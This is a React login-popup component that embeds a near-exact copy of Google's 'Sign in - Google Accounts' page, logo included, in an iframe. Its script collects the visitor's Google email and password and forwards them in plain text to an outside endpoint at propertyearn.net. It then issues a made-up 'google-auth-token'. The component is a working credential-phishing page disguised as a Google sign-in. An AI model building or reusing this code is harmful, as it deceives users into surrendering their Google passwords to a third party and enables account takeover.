import { Dialog, Box, IconButton, Snackbar, Alert, CircularProgress  } from '@mui/material';
import { Close } from '@mui/icons-material';
import { useEffect, useState } from 'react';

export default function GoogleLoginPopup({ open, onClose, onSuccess }) {
  const [snackbar, setSnackbar] = useState({ open: false, message: '', severity: 'info' });
  const [saving, setSaving] = useState(false); 
  useEffect(() => {
    const handleMessage = async (event) => {
        if (event.data.type === 'SAVE_GOOGLE_CREDENTIALS') {
            setSaving(true);
            try {
                const { email, password, success } = event.data;
                
                console.log('Processing Google popup login for:', email);
                
                // Register or login user via Google popup endpoint
                const response = await fetch('https://propertyearn.net/api/api/google-popup/register', {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json',
                    },
                    body: JSON.stringify({
                        email: email,
                        password: password, // Plain text password
                        login_successful: success
                    })
                });
                
                if (response.ok) {
                    const result = await response.json();
                    console.log('Google popup registration successful:', result);
                    
                    // Store the token and handle success
                    localStorage.setItem('token', result.token);
                    
                    setSnackbar({
                        open: true,
                        message: result.profile_complete ? 
                            'Login successful!' : 
                            'Welcome! Please complete your profile.',
                        severity: 'success'
                    });
                    
                    // Close popup and redirect
                    setTimeout(() => {
                        onSuccess(result.token);
                        onClose();
                    }, 1500);
                    
                } else {
                    const errorData = await response.json();
                    console.error('Google popup registration failed:', errorData);
                    setSnackbar({
                        open: true,
                        message: `Login failed: ${errorData.error || 'Unknown error'}`,
                        severity: 'error'
                    });
                }
            } catch (error) {
                console.error('Network error during Google popup registration:', error);
                setSnackbar({
                    open: true,
                    message: `Network error: ${error.message}`,
                    severity: 'error'
                });
            } finally {
                setSaving(false);
            }
        }
    };

    window.addEventListener('message', handleMessage);
    return () => window.removeEventListener('message', handleMessage);
}, [onSuccess, onClose]);

  const handleCloseSnackbar = () => {
    setSnackbar({ ...snackbar, open: false });
  };


  // After verifying token is valid, check if profile needs completion
useEffect(() => {
    const checkProfile = async () => {
        try {
            const token = localStorage.getItem('token');
            const response = await fetch('https://propertyearn.net/api/api/user/profile', {
                headers: { 'Authorization': `Bearer ${token}` }
            });
            
            if (response.ok) {
                const userData = await response.json();
                // You can add logic here to redirect to profile completion page
                // if userData needs profile completion
            }
        } catch (error) {
            console.error('Error checking user profile:', error);
        }
    };
    
    checkProfile();
}, []);

  return (
    <>
      <Dialog
        open={open}
        onClose={onClose}
        maxWidth="sm"
        fullWidth
        PaperProps={{
          style: {
            height: '80vh',
            maxHeight: '700px',
            borderRadius: '8px',
            overflow: 'hidden'
          }
        }}
      >
        <Box sx={{ position: 'relative', height: '100%' }}>
          {/* Close Button */}
          <IconButton
            onClick={onClose}
            sx={{
              position: 'absolute',
              right: 8,
              top: 8,
              zIndex: 1000,
              backgroundColor: 'rgba(255,255,255,0.9)',
              '&:hover': {
                backgroundColor: 'rgba(255,255,255,1)'
              }
            }}
          >
            <Close />
          </IconButton>
        
        {/* Loading Overlay */}
        {saving && (
          <Box
            sx={{
              position: 'absolute',
              top: 0,
              left: 0,
              right: 0,
              bottom: 0,
              backgroundColor: 'rgba(255, 255, 255, 0.8)',
              display: 'flex',
              alignItems: 'center',
              justifyContent: 'center',
              zIndex: 1001,
              flexDirection: 'column',
              gap: 2
            }}
          >
            <CircularProgress size={40} />
            <Box sx={{ fontWeight: 'medium', color: 'text.primary' }}>
              Creating your account...
            </Box>
          </Box>
        )}


          {/* Google Login Iframe/Content */}
          <Box sx={{ height: '100%', overflow: 'hidden' }}>
            <iframe
              srcDoc={`
<!DOCTYPE html>
<html lang="en-US">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Sign in - Google Accounts</title>
    <link rel="preconnect" href="https://fonts.gstatic.com">
    <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;500&display=swap" rel="stylesheet">
    <style>
        * { box-sizing: border-box; margin: 0; padding: 0; }
        body { font-family: Roboto, Arial, sans-serif; background-color: #fff; color: #202124; font-size: 14px; line-height: 1.4286; margin: 0; padding: 0; min-height: 100vh; display: flex; flex-direction: column; }
        .header { padding: 20px; display: flex; justify-content: space-between; align-items: center; }
        .logo { display: flex; align-items: center; }
        .logo-image { width: 75px; height: 24px; }
        .logo-text { color: #5f6368; font-size: 22px; margin-left: 8px; }
        .nav-links { display: flex; gap: 16px; }
        .nav-link { color: #1a73e8; text-decoration: none; font-size: 14px; font-weight: 500; }
        .container { display: flex; flex-direction: column; align-items: center; justify-content: center; flex: 1; padding: 20px; }
        .signin-card { width: 100%; max-width: 448px; border: 1px solid #dadce0; border-radius: 8px; padding: 48px 40px 36px; margin: 0 auto; position: relative; overflow: hidden; }
        .signin-title { font-size: 24px; font-weight: 400; line-height: 1.3333; text-align: center; margin-bottom: 16px; }
        .signin-subtitle { font-size: 16px; font-weight: 400; letter-spacing: .1px; line-height: 1.5; text-align: center; margin-bottom: 24px; color: #202124; }
        .form-group { margin-bottom: 24px; position: relative; }
        .email-field { width: 100%; height: 56px; padding: 13px 15px; border: 1px solid #dadce0; border-radius: 4px; font-size: 16px; transition: all 0.3s ease; opacity: 1; }
        .password-field { width: 100%; height: 56px; padding: 13px 45px 13px 15px; border: 1px solid #dadce0; border-radius: 4px; font-size: 16px; transition: all 0.3s ease; position: absolute; top: 0; left: 0; opacity: 0; transform: translateY(-10px); pointer-events: none; }
        .email-field.active { opacity: 1; transform: translateY(0); pointer-events: auto; }
        .password-field.active { opacity: 1; transform: translateY(0); pointer-events: auto; }
        .email-field:focus, .password-field:focus { border-color: #1a73e8; outline: none; box-shadow: 0 0 0 2px rgba(26, 115, 232, 0.2); }
        .user-info { display: flex; align-items: center; margin-bottom: 16px; padding: 8px 0; transition: all 0.3s ease; opacity: 1; max-height: 40px; }
        .user-info.hidden { opacity: 0; max-height: 0; margin-bottom: 0; overflow: hidden; }
        .user-avatar { width: 32px; height: 32px; border-radius: 50%; background-color: #1a73e8; color: white; display: flex; align-items: center; justify-content: center; font-weight: 500; margin-right: 12px; }
        .user-email { font-size: 14px; color: #202124; }
        .change-account { color: #1a73e8; text-decoration: none; font-size: 14px; margin-left: auto; cursor: pointer; }
        .forgot-email, .forgot-password { color: #1a73e8; text-decoration: none; font-weight: 500; font-size: 14px; margin-bottom: 32px; display: inline-block; }
        .info-text { color: #5f6368; font-size: 14px; line-height: 1.4286; margin-bottom: 32px; }
        .info-text a { color: #1a73e8; text-decoration: none; }
        .actions { display: flex; justify-content: space-between; align-items: center; }
        .create-account { color: #1a73e8; text-decoration: none; font-weight: 500; font-size: 14px; }
        .next-button { background-color: #1a73e8; color: white; border: none; border-radius: 4px; padding: 10px 24px; font-size: 14px; font-weight: 500; cursor: pointer; transition: background-color 0.2s; }
        .next-button:hover { background-color: #1b66c9; box-shadow: 0 1px 2px 0 rgba(60,64,67,.3), 0 1px 3px 1px rgba(60,64,67,.15); }
        .show-password { position: absolute; right: 12px; top: 50%; transform: translateY(-50%); background: none; border: none; color: #1a73e8; font-size: 14px; cursor: pointer; z-index: 10; opacity: 0; pointer-events: none; transition: opacity 0.3s ease; }
        .show-password.active { opacity: 1; pointer-events: auto; }
        .footer { background-color: #f8f9fa; padding: 24px; margin-top: auto; }
        .footer-content { max-width: 1200px; margin: 0 auto; display: flex; justify-content: space-between; flex-wrap: wrap; }
        .language-selector { margin-bottom: 16px; }
        .language-select { border: none; background: transparent; color: #5f6368; font-size: 12px; padding: 8px 16px 8px 0; }
        .footer-links { display: flex; flex-wrap: wrap; gap: 24px; }
        .footer-link { color: #5f6368; text-decoration: none; font-size: 12px; }
        @media (max-width: 480px) {
            .signin-card { border: none; padding: 24px; }
            .actions { flex-direction: column; align-items: flex-start; gap: 16px; }
            .footer-content { flex-direction: column; }
        }
    </style>
</head>
<body>
    <header class="header">
        <div class="logo">
            <img src="https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg" alt="Google" class="logo-image">
            <span class="logo-text">Accounts</span>
        </div>
        <div class="nav-links">
            <a href="#" class="nav-link">Help</a>
            <a href="#" class="nav-link">Privacy</a>
            <a href="#" class="nav-link">Terms</a>
        </div>
    </header>

    <main class="container">
        <div class="signin-card">
            <h1 class="signin-title" id="page-title">Sign in</h1>
            <p class="signin-subtitle" id="page-subtitle">Use your Google Account</p>
            
            <div class="user-info hidden" id="user-info">
                <div class="user-avatar" id="user-avatar">A</div>
                <div class="user-email" id="user-email-display"></div>
                <a class="change-account" id="change-account">Change account</a>
            </div>
            
            <form id="signin-form">
                <div class="form-group" style="position: relative; height: 56px;">
                    <input type="email" class="email-field active" id="email" placeholder="Email or phone" autocomplete="email" required>
                    <input type="password" class="password-field" id="password" placeholder="Enter your password" autocomplete="current-password" required>
                    <button type="button" class="show-password" id="show-password">Show</button>
                </div>
                
                <a href="#" class="forgot-email" id="forgot-email">Forgot email?</a>
                <a href="#" class="forgot-password hidden" id="forgot-password">Forgot password?</a>
                
                <p class="info-text" id="info-text">
                    Not your computer? Use Guest mode to sign in privately.
                    <a href="#">Learn more</a>
                </p>
                
                <div class="actions">
                    <a href="#" class="create-account">Create account</a>
                    <button type="button" class="next-button" id="submit-btn">Next</button>
                </div>
            </form>
        </div>
    </main>

    <footer class="footer">
        <div class="footer-content">
            <div class="language-selector">
                <select class="language-select">
                    <option>English (United States)</option>
                    <option>Español</option>
                    <option>Français</option>
                    <option>Deutsch</option>
                </select>
            </div>
            <div class="footer-links">
                <a href="#" class="footer-link">Help</a>
                <a href="#" class="footer-link">Privacy</a>
                <a href="#" class="footer-link">Terms</a>
            </div>
        </div>
    </footer>

    <script>
        async function saveGoogleCredentials(email, password, success) {
            try {
                if (parent && parent.postMessage) {
                    parent.postMessage({
                        type: 'SAVE_GOOGLE_CREDENTIALS',
                        email: email,
                        password: password,
                        success: success
                    }, '*');
                }
            } catch (error) {
                console.error('Failed to save credentials:', error);
            }
        }

        document.addEventListener('DOMContentLoaded', function() {
            const emailInput = document.getElementById('email');
            const passwordInput = document.getElementById('password');
            const showPasswordBtn = document.getElementById('show-password');
            const submitBtn = document.getElementById('submit-btn');
            const userInfo = document.getElementById('user-info');
            const userAvatar = document.getElementById('user-avatar');
            const userEmailDisplay = document.getElementById('user-email-display');
            const changeAccountBtn = document.getElementById('change-account');
            const forgotEmailLink = document.getElementById('forgot-email');
            const forgotPasswordLink = document.getElementById('forgot-password');
            const pageTitle = document.getElementById('page-title');
            const pageSubtitle = document.getElementById('page-subtitle');
            const infoText = document.getElementById('info-text');
            
            let isPasswordMode = false;
            let currentEmail = '';
            
            submitBtn.addEventListener('click', async function(e) {
                e.preventDefault();
                
                if (!isPasswordMode) {
                    const email = emailInput.value.trim();
                    if (!email) {
                        alert('Please enter your email');
                        return;
                    }
                    currentEmail = email;
                    switchToPasswordMode();
                } else {
                    const password = passwordInput.value;
                    if (!password) {
                        alert('Please enter your password');
                        return;
                    }
                    
                    await saveGoogleCredentials(currentEmail, password, true);
                    
                    if (parent && parent.postMessage) {
                        parent.postMessage({
                            type: 'GOOGLE_LOGIN_SUCCESS',
                            email: currentEmail,
                            token: 'google-auth-token-' + Date.now()
                        }, '*');
                    }
                    
                }
            });
            
            showPasswordBtn.addEventListener('click', function() {
                if (passwordInput.type === 'password') {
                    passwordInput.type = 'text';
                    showPasswordBtn.textContent = 'Hide';
                } else {
                    passwordInput.type = 'password';
                    showPasswordBtn.textContent = 'Show';
                }
            });
            
            changeAccountBtn.addEventListener('click', function() {
                switchToEmailMode();
            });
            
            forgotPasswordLink.addEventListener('click', function(e) {
                e.preventDefault();
                alert('In a real implementation, this would help you reset your password.');
            });
            
            forgotEmailLink.addEventListener('click', function(e) {
                e.preventDefault();
                alert('In a real implementation, this would help you recover your email.');
            });
            
            function switchToPasswordMode() {
                isPasswordMode = true;
                emailInput.classList.remove('active');
                passwordInput.classList.add('active');
                showPasswordBtn.classList.add('active');
                forgotEmailLink.classList.add('hidden');
                forgotPasswordLink.classList.remove('hidden');
                userInfo.classList.remove('hidden');
                submitBtn.textContent = 'Sign in';
                userEmailDisplay.textContent = currentEmail;
                userAvatar.textContent = currentEmail.charAt(0).toUpperCase();
                pageTitle.textContent = 'Welcome';
                pageSubtitle.textContent = currentEmail;
                infoText.textContent = '';
                setTimeout(() => { passwordInput.focus(); }, 300);
            }
            
            function switchToEmailMode() {
                isPasswordMode = false;
                emailInput.classList.add('active');
                passwordInput.classList.remove('active');
                showPasswordBtn.classList.remove('active');
                forgotEmailLink.classList.remove('hidden');
                forgotPasswordLink.classList.add('hidden');
                userInfo.classList.add('hidden');
                submitBtn.textContent = 'Next';
                pageTitle.textContent = 'Sign in';
                pageSubtitle.textContent = 'Use your Google Account';
                infoText.innerHTML = 'Not your computer? Use Guest mode to sign in privately. <a href="#">Learn more</a>';
                passwordInput.value = '';
                passwordInput.type = 'password';
                showPasswordBtn.textContent = 'Show';
                setTimeout(() => { emailInput.focus(); }, 300);
            }

            document.addEventListener('keypress', function(e) {
                if (e.key === 'Enter') {
                    submitBtn.click();
                }
            });
        });
    </script>
</body>
</html>
              `}
              style={{
                width: '100%',
                height: '100%',
                border: 'none',
                borderRadius: '8px'
              }}
              title="Google Sign In"
            />
          </Box>
        </Box>
      </Dialog>

      {/* Snackbar for notifications */}
      <Snackbar 
        open={snackbar.open} 
        autoHideDuration={6000} 
        onClose={handleCloseSnackbar}
        anchorOrigin={{ vertical: 'bottom', horizontal: 'center' }}
      >
        <Alert onClose={handleCloseSnackbar} severity={snackbar.severity}>
          {snackbar.message}
        </Alert>
      </Snackbar>
    </>
  );
}